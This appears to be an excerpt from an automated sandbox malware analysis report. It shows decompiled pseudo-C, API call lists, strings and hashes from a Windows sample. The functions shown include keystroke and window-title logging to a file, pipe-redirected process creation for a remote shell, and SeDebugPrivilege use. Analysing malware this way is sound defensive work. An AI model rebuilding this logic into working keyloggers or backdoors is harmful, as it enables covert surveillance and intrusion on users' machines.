                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00437634
                                        • Part of subcall function 0043E907: lstrcmpA.KERNEL32(?,0043F9CB,?,open,0043F9CB), ref: 0043E940
                                      • TranslateMessage.USER32(?), ref: 0043761B
                                      • DispatchMessageA.USER32(?), ref: 00437626
                                      Strings
                                      • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 00437568
                                      • c:\windows\system32\user32.dll, xrefs: 004375CF
                                      • SetWindowsHookExA, xrefs: 004375E7
                                      • \Microsoft Vision\, xrefs: 0043752D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$HandleMessage$CloseCreatelstrcat$AllocDispatchFolderLocalModulePathReadSizeTimeTranslateVirtuallstrcmpwsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$SetWindowsHookExA$\Microsoft Vision\$c:\windows\system32\user32.dll
                                      • API String ID: 1431388325-3884914687
                                      • Opcode ID: 41c601a6e80cbacfb71d2cbd338460a8f253fac00c0851fdb6ac120f768e8396
                                      • Instruction ID: c55a43e6e8974fea1b9ad4a5ec4fabac616600c770b5ddb45c63df93b48110ec
                                      • Opcode Fuzzy Hash: 41c601a6e80cbacfb71d2cbd338460a8f253fac00c0851fdb6ac120f768e8396
                                      • Instruction Fuzzy Hash: AD41A1B5504200ABD7109FA9DC09E2B77ECFB8E704F01092EFA49D3191D6B8E904C76A
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E0043CD2C(void* __eflags, char _a4) {
                                      				void* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				void* _v24;
                                      				struct _SECURITY_ATTRIBUTES _v36;
                                      				void* _t54;
                                      				void* _t61;
                                      				void* _t64;
                                      				int _t66;
                                      				void* _t76;
                                      				int _t94;
                                      				void* _t95;
                                      
                                      				E0043CCBA(0x446550);
                                      				_v12 = _v12 & 0x00000000;
                                      				_v16 = _v16 & 0x00000000;
                                      				_v8 = _v8 & 0x00000000;
                                      				_t94 = 1;
                                      				_v20 = _v20 & 0x00000000;
                                      				_v24 = _v24 & 0x00000000;
                                      				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
                                      				_v36.nLength = 0xc;
                                      				_v36.bInheritHandle = 1;
                                      				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
                                      					L7:
                                      					E0043CEBD( &_v12);
                                      					E0043CEBD( &_v8);
                                      					E0043CEBD( &_v16);
                                      					E0043CEBD( &_v20);
                                      					E0043CEBD( &_v24);
                                      					E0043CCBA(0x446550);
                                      					_t94 = 0;
                                      				} else {
                                      					_t54 = GetCurrentProcess();
                                      					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
                                      						goto L7;
                                      					} else {
                                      						_t61 = GetCurrentProcess();
                                      						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x446558, 0, 0, 2) == 0) {
                                      							goto L7;
                                      						} else {
                                      							_t64 = GetCurrentProcess();
                                      							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x44655c, 0, 0, 2);
                                      							_t101 = _t66;
                                      							if(_t66 == 0) {
                                      								goto L7;
                                      							} else {
                                      								E0043CEBD( &_v12);
                                      								E0043CEBD( &_v20);
                                      								E0043345A(_t95,  &_a4);
                                      								if(E0043CACA(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
                                      									goto L7;
                                      								} else {
                                      									E0043CEBD( &_v8);
                                      									E0043CEBD( &_v24);
                                      									E0043CEBD( &_v16);
                                      									 *0x446560 = CreateEventA(0, 1, 0, 0);
                                      									_t76 = CreateThread(0, 0, E0043CB63, 0x446550, 0, 0x446568);
                                      									 *0x446564 = _t76;
                                      									if(_t76 == 0) {
                                      										goto L7;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				E00435A2D(_a4);
                                      				return _t94;
                                      			}

                                      APIs
                                        • Part of subcall function 0043CCBA: GetCurrentThreadId.KERNEL32(?,00000000,0043292E,00000000,exit,00000000,start), ref: 0043CCC6
                                        • Part of subcall function 0043CCBA: SetEvent.KERNEL32(00000000), ref: 0043CCDA
                                        • Part of subcall function 0043CCBA: WaitForSingleObject.KERNEL32(00446564,00001388), ref: 0043CCE7
                                        • Part of subcall function 0043CCBA: TerminateThread.KERNEL32(00446564,000000FE), ref: 0043CCF8
                                      • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 0043CD72
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 0043CD8F
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0043CD95
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0043CD9E
                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 0043CDB6
                                      • GetCurrentProcess.KERNEL32(00446558,00000000,00000000,00000002,?,00000000), ref: 0043CDCF
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0043CDD5
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0043CDD8
                                      • GetCurrentProcess.KERNEL32(0044655C,00000000,00000000,00000002,?,00000000), ref: 0043CDED
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 0043CDF3
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043CE49
                                      • CreateThread.KERNEL32(00000000,00000000,0043CB63,00446550,00000000,00446568), ref: 0043CE69
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 0043CDF6
                                        • Part of subcall function 0043CEBD: CloseHandle.KERNEL32(00446560), ref: 0043CEC7
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043CACA: CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000010,00000000,00000000,?,00000000), ref: 0043CB1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                      • String ID: PeD$PeD
                                      • API String ID: 337272696-1629772315
                                      • Opcode ID: 2d65bd5ecfb29ad49ead6c41371b354e3091f7554898dc26b4b4dfad31843db8
                                      • Instruction ID: 16956773d88fabf2b0ede425fe3a8f8a30fd143fbb6778f3c9f5114ddcab6b82
                                      • Opcode Fuzzy Hash: 2d65bd5ecfb29ad49ead6c41371b354e3091f7554898dc26b4b4dfad31843db8
                                      • Instruction Fuzzy Hash: CA413E71940209BAEB14EBE1DC86FEFB778AF19705F10542BF101B20D5DBB89A04CB68
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00437AEB(void* __ecx, void* __edx, void* __eflags) {
                                      				struct _SECURITY_ATTRIBUTES* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				short _v536;
                                      				int _t35;
                                      				intOrPtr _t37;
                                      				int _t39;
                                      				intOrPtr _t40;
                                      				WCHAR* _t41;
                                      				intOrPtr _t43;
                                      				void* _t44;
                                      				int _t46;
                                      				intOrPtr _t48;
                                      				intOrPtr _t50;
                                      				long _t54;
                                      				intOrPtr _t55;
                                      				intOrPtr _t57;
                                      				void* _t59;
                                      				intOrPtr _t61;
                                      				intOrPtr _t63;
                                      				long _t65;
                                      				intOrPtr _t66;
                                      				void* _t70;
                                      				void* _t73;
                                      				intOrPtr _t83;
                                      				void* _t94;
                                      				void* _t97;
                                      				void* _t98;
                                      				void* _t100;
                                      
                                      				_t94 = __edx;
                                      				_v16 = __ecx;
                                      				E00431052( &_v536, 0, 0x208);
                                      				_v8 = 0;
                                      				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
                                      				_t106 = _t35;
                                      				if(_t35 <= 0) {
                                      					E0043312C( &_v8, _t94, L"{Unknown}");
                                      				} else {
                                      					_t73 = E00433412( &_v12,  &_v536);
                                      					E00433162(E00433297( &_v8, _t94, _t106, "{"), _t106, _t73);
                                      					E00433297(_t74, _t94, _t106, "}");
                                      					E00435A2D(_v12);
                                      					_v12 = 0;
                                      				}
                                      				_t37 =  *0x446690; // 0x0
                                      				_t39 = lstrlenW(_t37 + 0x210);
                                      				_t40 =  *0x446690; // 0x0
                                      				if(_t39 == 0) {
                                      					L6:
                                      					_t41 = _t40 + 0x210;
                                      					__eflags = _t41;
                                      					lstrcpyW(_t41, _v8);
                                      					_t43 =  *0x446690; // 0x0
                                      					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
                                      				} else {
                                      					_t70 = E00433075( &_v8, E00433412( &_v12, _t40 + 0x210));
                                      					E00435A2D(_v12);
                                      					_t40 =  *0x446690; // 0x0
                                      					_v12 = 0;
                                      					if(_t70 == 0) {
                                      						goto L6;
                                      					} else {
                                      						 *(_t40 + 0xa10) = 1;
                                      					}
                                      				}
                                      				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
                                      				_t83 =  *0x446690; // 0x0
                                      				 *(_t83 + 4) = _t44;
                                      				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
                                      					_t21 = _t83 + 8; // 0x8
                                      					_t98 = L"\r\n";
                                      					_t54 = lstrlenW(_t98);
                                      					_t55 =  *0x446690; // 0x0
                                      					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
                                      					_t57 =  *0x446690; // 0x0
                                      					_t59 = E0043308E( &_v8);
                                      					_t61 =  *0x446690; // 0x0
                                      					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
                                      					_t63 =  *0x446690; // 0x0
                                      					_t100 = L"\r\n";
                                      					_t65 = lstrlenW(_t100);
                                      					_t66 =  *0x446690; // 0x0
                                      					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
                                      					_t83 =  *0x446690; // 0x0
                                      				}
                                      				_t97 = _v16;
                                      				_t28 = _t83 + 8; // 0x8
                                      				_t46 = lstrlenW(_t97);
                                      				_t48 =  *0x446690; // 0x0
                                      				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
                                      				_t50 =  *0x446690; // 0x0
                                      				CloseHandle( *(_t50 + 4));
                                      				return E00435A2D(_v8);
                                      			}

                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00437B14
                                      • GetWindowTextW.USER32(00000000,?,00000104), ref: 00437B27
                                      • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 00437B90
                                      • lstrcpyW.KERNEL32(-00000210,?), ref: 00437BDD
                                      • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00437BFE
                                      • lstrlenW.KERNEL32(004429A0,00000008,00000000,?,?), ref: 00437C27
                                      • WriteFile.KERNEL32(?,004429A0,00000000,?,?), ref: 00437C33
                                      • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000), ref: 00437C57
                                      • lstrlenW.KERNEL32(004429A0,-00000008,00000000,?,?), ref: 00437C6A
                                      • WriteFile.KERNEL32(?,004429A0,00000000,?,?), ref: 00437C76
                                      • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 00437C88
                                      • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 00437C96
                                      • CloseHandle.KERNEL32(?), ref: 00437CA0
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 00433162: lstrcatW.KERNEL32(00000000,?), ref: 00433192
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                      • String ID: {Unknown}
                                      • API String ID: 2314120260-4054869793
                                      • Opcode ID: 89567b6256b8d008784d5c57ab9fc93ca064703fc76aece5004779e9dc672109
                                      • Instruction ID: 9da2dd976ae0851069b8f0034fe27f83b6899eab9a0939bc721ea45e4388457e
                                      • Opcode Fuzzy Hash: 89567b6256b8d008784d5c57ab9fc93ca064703fc76aece5004779e9dc672109
                                      • Instruction Fuzzy Hash: 0451A175A00208BFD700EF55DD85FAA77B8FF0A308F0640A9F909A7261C774AE04CB59
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00CC9B7F
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC9734
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC9746
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC9758
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC976A
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC977C
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC978E
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97A0
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97B2
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97C4
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97D6
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97E8
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC97FA
                                        • Part of subcall function 00CC9717: _free.LIBCMT ref: 00CC980C
                                      • _free.LIBCMT ref: 00CC9B74
                                        • Part of subcall function 00CC628A: HeapFree.KERNEL32(00000000,00000000), ref: 00CC62A0
                                        • Part of subcall function 00CC628A: GetLastError.KERNEL32(?,?,00CC98A8,?,00000000,?,00000000,?,00CC98CF,?,00000007,?,?,00CC9CD3,?,?), ref: 00CC62B2
                                      • _free.LIBCMT ref: 00CC9B96
                                      • _free.LIBCMT ref: 00CC9BAB
                                      • _free.LIBCMT ref: 00CC9BB6
                                      • _free.LIBCMT ref: 00CC9BD8
                                      • _free.LIBCMT ref: 00CC9BEB
                                      • _free.LIBCMT ref: 00CC9BF9
                                      • _free.LIBCMT ref: 00CC9C04
                                      • _free.LIBCMT ref: 00CC9C3C
                                      • _free.LIBCMT ref: 00CC9C43
                                      • _free.LIBCMT ref: 00CC9C60
                                      • _free.LIBCMT ref: 00CC9C78
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: 9cedb4e92ac7fae3bf2c465ebbe9231e94b1b17b5b3d0bda23e026fd4f63f6bb
                                      • Instruction ID: 23ce9ffa6e7acb406f9e3bd4ad9399cb462240b0501d85e6ef94fb82e1fe90b9
                                      • Opcode Fuzzy Hash: 9cedb4e92ac7fae3bf2c465ebbe9231e94b1b17b5b3d0bda23e026fd4f63f6bb
                                      • Instruction Fuzzy Hash: F0315972600705AFEB30AA39DD49F56B3E8FF48311F10456DE069D7291DF35AE809B10
                                      Uniqueness

                                      Uniqueness Score: 0.25%

                                      C-Code - Quality: 100%
                                      			E0043B90E(struct _QUERY_SERVICE_CONFIG* _a4) {
                                      				int _v8;
                                      				void* __ecx;
                                      				void* _t10;
                                      				void* _t26;
                                      				struct _QUERY_SERVICE_CONFIG* _t34;
                                      				void* _t37;
                                      
                                      				_v8 = 0;
                                      				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
                                      				_t37 = _t10;
                                      				if(_t37 != 0) {
                                      					_t26 = OpenServiceW(_t37,  *_a4, 1);
                                      					if(_t26 != 0) {
                                      						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
                                      							_t34 = E00435A87(_v8);
                                      							_a4 = _t34;
                                      							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
                                      								CloseServiceHandle(_t37);
                                      								CloseServiceHandle(_t26);
                                      								E004310C1(_a4);
                                      								_t10 =  *(_t34 + 4);
                                      							} else {
                                      								goto L6;
                                      							}
                                      						} else {
                                      							L6:
                                      							CloseServiceHandle(_t37);
                                      							CloseServiceHandle(_t26);
                                      							goto L7;
                                      						}
                                      					} else {
                                      						CloseServiceHandle(_t37);
                                      						L7:
                                      						_t10 = 0;
                                      					}
                                      				}
                                      				return _t10;
                                      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0043B921
                                      • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0043B93A
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B947
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0043B956
                                      • GetLastError.KERNEL32 ref: 0043B960
                                      • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0043B981
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B992
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B995
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B9A5
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043B9A8
                                        • Part of subcall function 004310C1: GetProcessHeap.KERNEL32(00000000,00000000,00433341,00000000,00000000,?,?,?,00000000), ref: 004310C7
                                        • Part of subcall function 004310C1: HeapFree.KERNEL32(00000000,?,?), ref: 004310CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                      • String ID: ServicesActive
                                      • API String ID: 1929760286-3071072050
                                      • Opcode ID: 45616e4342232f194c85f53f3905afa11dc3d0d2de4ea721b5f0b82aad506150
                                      • Instruction ID: 787cf525705c3054e006756fb53f483166ff966a1435b526419edb296f28109d
                                      • Opcode Fuzzy Hash: 45616e4342232f194c85f53f3905afa11dc3d0d2de4ea721b5f0b82aad506150
                                      • Instruction Fuzzy Hash: 4A1190B5900514BBCB109B62DD89F9F7EACEF8A754B105026F701D2221DBB89E00CBE8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 74%
                                      			E0043C253(struct _CRITICAL_SECTION* __ecx, void* __edx) {
                                      				char _v28;
                                      				char _v32;
                                      				char _v36;
                                      				char _v48;
                                      				char _v52;
                                      				char _v56;
                                      				signed int _v60;
                                      				char _v64;
                                      				char _v68;
                                      				intOrPtr _v76;
                                      				int _t75;
                                      				int _t76;
                                      				int _t79;
                                      				int _t80;
                                      				void* _t82;
                                      				void* _t83;
                                      				int _t84;
                                      				int _t86;
                                      				int _t87;
                                      				int _t93;
                                      				void* _t94;
                                      				int _t132;
                                      				void* _t142;
                                      				char* _t143;
                                      				signed int _t154;
                                      				char* _t184;
                                      				intOrPtr _t193;
                                      				char* _t196;
                                      				void* _t199;
                                      				struct _CRITICAL_SECTION* _t202;
                                      				signed int _t211;
                                      				signed int _t213;
                                      				void* _t215;
                                      
                                      				_t199 = __edx;
                                      				_t156 = __ecx;
                                      				_t215 = (_t213 & 0xfffffff8) - 0x34;
                                      				_t202 = __ecx;
                                      				_t154 = 0;
                                      				_v36 = 0;
                                      				_v32 = 0;
                                      				_v56 = 0;
                                      				EnterCriticalSection(__ecx);
                                      				if(E0043DBF3(_t156) == 1) {
                                      					_t156 =  &_v56;
                                      					E0043D5DB( &_v56);
                                      				}
                                      				_t205 = _t202 + 0x38;
                                      				_t75 = PathFileExistsW( *(_t202 + 0x38));
                                      				_t217 = _t75;
                                      				if(_t75 != 0) {
                                      					L11:
                                      					_t206 = _t202 + 0x3c;
                                      					_t76 = PathFileExistsW( *(_t202 + 0x3c));
                                      					__eflags = _t76;
                                      					if(_t76 != 0) {
                                      						L17:
                                      						E0043C033(_t202, _t199);
                                      						E0043C01A(_t202);
                                      						_t159 = _t202;
                                      						_t79 = E0043BDDC(_t202);
                                      						__eflags = _t79;
                                      						if(_t79 != 0) {
                                      							_t160 = _t202;
                                      							_t80 = E0043BD37(_t202, _t199, _t159);
                                      							__eflags = _t80;
                                      							if(_t80 != 0) {
                                      								E0043BFB7(_t160);
                                      								_t82 = E00433412( &_v52, L"SeDebugPrivilege");
                                      								_t83 = GetCurrentProcess();
                                      								_t200 = _t82;
                                      								_t84 = E0043D609(_t83, _t82);
                                      								E00435A2D(_v56);
                                      								__eflags = _t84;
                                      								if(_t84 != 0) {
                                      									_t164 =  *(_t202 + 0x2c);
                                      									_t86 = E0043EC94( *(_t202 + 0x2c));
                                      									__eflags = _t86;
                                      									if(_t86 != 0) {
                                      										Sleep(0x3e8);
                                      										_t87 =  *(_t202 + 0x48);
                                      										__eflags = _t87;
                                      										if(_t87 != 0) {
                                      											_t211 = _t154;
                                      											__eflags = _t211 - _t87;
                                      											do {
                                      												E0043582B(_t164 & 0xffffff00 | __eflags > 0x00000000);
                                      												E0043345A( &_v52,  *((intOrPtr*)(_t202 + 0x40)) + _t211 * 4);
                                      												E0043B889( &_v56);
                                      												_t164 = _v60;
                                      												E00435A2D(_v60);
                                      												_t211 = _t211 + 1;
                                      												_v60 = _t154;
                                      												__eflags = _t211 -  *(_t202 + 0x48);
                                      											} while (_t211 <  *(_t202 + 0x48));
                                      										}
                                      										Sleep(0x1f4);
                                      										E0043345A( &_v52, _t202 + 0x28);
                                      										E0043B889( &_v56);
                                      										_t166 = _v60;
                                      										E00435A2D(_v60);
                                      										Sleep(0x1f4);
                                      										_t93 = E0043B9BC(_t200, __eflags, _v60);
                                      										__eflags = _t93;
                                      										if(_t93 != 0) {
                                      											_t94 = E0043DBF3(_t166);
                                      											__eflags = _t94 - 1;
                                      											if(_t94 == 1) {
                                      												E0043D5B4(_v56);
                                      											}
                                      											E00434B53( *((intOrPtr*)(_t202 + 0x60)), E004347F1( &_v52, _t154, _t202 + 0x58, _t202 + 0x5c));
                                      											E004347CE( &_v68);
                                      											LeaveCriticalSection(_t202);
                                      											_t154 = 8;
                                      										} else {
                                      											_push(_t202 + 0x5c);
                                      											_push(_t202 + 0x58);
                                      											_push(7);
                                      											goto L31;
                                      										}
                                      									} else {
                                      										E0043D5B4(_v56);
                                      										_push(_t202 + 0x5c);
                                      										_push(_t202 + 0x58);
                                      										_push(5);
                                      										goto L31;
                                      									}
                                      								} else {
                                      									E0043D5B4(_v56);
                                      									_push(_t202 + 0x5c);
                                      									_push(_t202 + 0x58);
                                      									_push(3);
                                      									goto L31;
                                      								}
                                      							} else {
                                      								E0043D5B4(_v56);
                                      								_push(_t202 + 0x5c);
                                      								_push(_t202 + 0x58);
                                      								_push(6);
                                      								goto L31;
                                      							}
                                      						} else {
                                      							E0043D5B4(_v56);
                                      							_push(_t202 + 0x5c);
                                      							_push(_t202 + 0x58);
                                      							_push(4);
                                      							L31:
                                      							E00434B53( *((intOrPtr*)(_t202 + 0x60)), E004347F1( &_v52));
                                      							E004347CE( &_v68);
                                      							LeaveCriticalSection(_t202);
                                      						}
                                      					} else {
                                      						E0043345A(_t215, _t206);
                                      						E0043E1A1( &_v32, __eflags, _t156, _t154);
                                      						_t183 =  *((intOrPtr*)(_t202 + 0x54));
                                      						E0044146E( *((intOrPtr*)(_t202 + 0x54)), _t199,  &_v64,  *((intOrPtr*)(_t202 + 0x60)), 3);
                                      						__eflags = _v76 - _t154;
                                      						if(_v76 != _t154) {
                                      							_t184 =  &_v28;
                                      							_t132 = E0043DD8E(_t184, _t183, _t183);
                                      							__eflags = _t132;
                                      							if(_t132 != 0) {
                                      								_push(_t184);
                                      								E0043E0DB( &_v28,  &_v52);
                                      								E0043E0C3( &_v36);
                                      							}
                                      							E00432E66( &_v52);
                                      							E0043DE8B( &_v28, __eflags);
                                      							goto L17;
                                      						} else {
                                      							E00432E66( &_v52);
                                      							goto L7;
                                      						}
                                      					}
                                      				} else {
                                      					E0043345A(_t215, _t205);
                                      					E0043E1A1( &_v32, _t217, _t156, _t154);
                                      					_t142 = E0043DBF3( &_v32);
                                      					_t193 =  *((intOrPtr*)(_t202 + 0x54));
                                      					_t143 =  &_v64;
                                      					if(_t142 != 1) {
                                      						_push(1);
                                      					} else {
                                      						_push(2);
                                      					}
                                      					_push( *((intOrPtr*)(_t202 + 0x60)));
                                      					_push(_t143);
                                      					E00432CCC( &_v48, E0044146E(_t193, _t199));
                                      					_t195 =  &_v68;
                                      					E00432E66( &_v68);
                                      					_t219 = _v52 - _t154;
                                      					if(_v52 != _t154) {
                                      						_t196 =  &_v28;
                                      						__eflags = E0043DD8E(_t196,  &_v68, _t195);
                                      						if(__eflags != 0) {
                                      							_push(_t196);
                                      							E0043E0DB( &_v28,  &_v36);
                                      							E0043E0C3( &_v36);
                                      						}
                                      						_t156 =  &_v28;
                                      						E0043DE8B( &_v28, __eflags);
                                      						goto L11;
                                      					} else {
                                      						L7:
                                      						E0043DE8B( &_v28, _t219);
                                      						_t154 = _t154 | 0xffffffff;
                                      					}
                                      				}
                                      				E00432E66( &_v36);
                                      				return _t154;
                                      			}

                                      0x0043c253
                                      0x0043c253
                                      0x0043c259
                                      0x0043c25f
                                      0x0043c261
                                      0x0043c264
                                      0x0043c268
                                      0x0043c26c
                                      0x0043c270
                                      0x0043c27e
                                      0x0043c280
                                      0x0043c284
                                      0x0043c284
                                      0x0043c289
                                      0x0043c28e
                                      0x0043c294
                                      0x0043c296
                                      0x0043c329
                                      0x0043c329
                                      0x0043c32e
                                      0x0043c334
                                      0x0043c336
                                      0x0043c3aa
                                      0x0043c3ac
                                      0x0043c3b3
                                      0x0043c3b8
                                      0x0043c3ba
                                      0x0043c3bf
                                      0x0043c3c1
                                      0x0043c3dc
                                      0x0043c3de
                                      0x0043c3e3
                                      0x0043c3e5
                                      0x0043c3ff
                                      0x0043c40d
                                      0x0043c414
                                      0x0043c41a
                                      0x0043c41e
                                      0x0043c429
                                      0x0043c42e
                                      0x0043c430
                                      0x0043c44a
